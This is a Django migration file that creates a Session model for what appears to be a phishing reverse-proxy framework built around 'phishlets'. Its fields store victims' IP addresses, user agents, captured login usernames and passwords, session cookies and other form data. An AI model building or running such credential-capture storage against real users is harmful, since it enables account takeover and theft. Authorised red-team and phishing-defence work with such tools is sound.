# Generated by Django 5.2.5 on 2025-08-11 14:39

import django.db.models.deletion
import django.utils.timezone
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('core', '0004_proxydomain_domaincertificate'),
    ]

    operations = [
        migrations.CreateModel(
            name='Session',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('session_cookie', models.CharField(help_text='Unique session identifier cookie value', max_length=255, unique=True)),
                ('proxy_domain', models.CharField(help_text='The proxy domain this session was created on', max_length=253)),
                ('visitor_ip', models.GenericIPAddressField(help_text='IP address of the visitor')),
                ('user_agent', models.TextField(blank=True, help_text='User agent string of the visitor')),
                ('captured_username', models.CharField(blank=True, help_text='Captured username from login forms', max_length=255)),
                ('captured_password', models.CharField(blank=True, help_text='Captured password from login forms', max_length=255)),
                ('captured_cookies', models.JSONField(blank=True, default=dict, help_text='Captured cookies from the visitor')),
                ('captured_custom', models.JSONField(blank=True, default=dict, help_text='Custom captured data (form fields, etc.)')),
                ('is_active', models.BooleanField(default=True, help_text='Whether this session is still active')),
                ('created', models.DateTimeField(default=django.utils.timezone.now, editable=False, help_text='When this session was created')),
                ('updated', models.DateTimeField(auto_now=True, help_text='When this session was last updated')),
                ('phishlet', models.ForeignKey(help_text='The phishlet this session belongs to', on_delete=django.db.models.deletion.CASCADE, related_name='sessions', to='core.phishlet')),
            ],
            options={
                'verbose_name': 'Session',
                'verbose_name_plural': 'Sessions',
                'ordering': ['-created'],
                'unique_together': {('session_cookie', 'phishlet', 'proxy_domain')},
            },
        ),
    ]
